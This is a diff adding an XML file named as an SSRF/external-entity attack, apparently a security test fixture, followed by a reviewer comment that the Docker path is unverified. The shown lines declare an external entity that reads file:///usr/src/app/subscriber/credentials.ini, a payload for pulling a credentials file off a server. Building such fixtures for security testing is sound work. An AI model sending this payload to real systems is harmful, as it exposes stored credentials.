ssrf-external-entity-attack.xml

```diff
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE results [
+	<!ELEMENT results (hits,took,references)>
+	<!ELEMENT hits (#PCDATA)>
+	<!ELEMENT took (#PCDATA)>
+	<!ELEMENT references (reference+)>
+	<!ELEMENT reference (name,id,location,revision-id)>
+	<!ELEMENT name (#PCDATA)>
+	<!ELEMENT id (#PCDATA)>
+	<!ELEMENT location (#PCDATA)>
+	<!ELEMENT revision-id (#PCDATA)>
+	<!ENTITY location PUBLIC "" "file:///usr/src/app/subscriber/credentials.ini">
```

Comment:
Added the file, but I haven't verified that the internal Docker path resolves to this file.